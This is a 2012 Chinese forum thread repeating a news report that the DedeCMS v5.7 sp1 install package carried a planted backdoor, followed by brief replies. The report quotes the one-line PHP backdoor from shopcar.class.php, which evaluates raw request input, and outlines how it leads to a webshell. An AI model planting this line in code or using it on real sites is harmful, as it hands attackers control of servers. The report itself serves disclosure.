织梦CMS系统被指植入后门

tibbs · 发表于 2012-3-22 19:58:35

　　瑞星与360今日对外发布警示，称国内知名的PHP开源网站管理系统织梦CMS（DedeCms）v5.7 sp1版本安装包被发现植入后门，黑客可通过此后门直接获得网站的控制权限，获取存储在服务器上的文件和数据库。
　　据织梦CMS官方数据显示，目前约有70万网站使用该系统搭建，涉及企业、政府机关、媒体机构、行业及个人网站等。
　　安全界人士分析发现，此次织梦CMS曝出的后门恶意代码存在于购物车类文件（shopcar.class.php）中，此类文件被植入一句后门代码“@eval(file_get_contents('php://input'));”。凡是调用该购物车类的文件均会触发后门，黑客只需要构造简单的数据包提交到服务器，就能够获取到该网站的WebShell，通过对服务器进一步渗透攻击，进而获取服务器的最高权限，直接访问服务器上的文件、数据库等信息。

  -----------来源网易
         ******************************************************************
            真  滴假滴？？
         ******************************************************************

西崽猪猪 · 发表于 2012-3-22 19:59:34

真的

vagaa · 发表于 2012-3-22 19:59:39

论坛前几天就有人发了啊

light · 发表于 2012-3-22 20:00:48

真的

弓虽女干 · 发表于 2012-3-22 20:01:27

wooyun上看到过

tibbs · 发表于 2012-3-22 20:01:59

我去，几天没上网居然 OUT成这样了

小和尚 · 发表于 2012-3-22 20:02:02

此事已经不是新闻了

ellrywych · 发表于 2012-3-22 20:08:34

必须的，

一不小心 · 发表于 2012-3-22 20:14:39

日，织梦这回估计萎了。

		自动登录	找回密码
密码			注册

[Windows VPS] 织梦CMS系统被指植入后门

相关帖子

浏览过的版块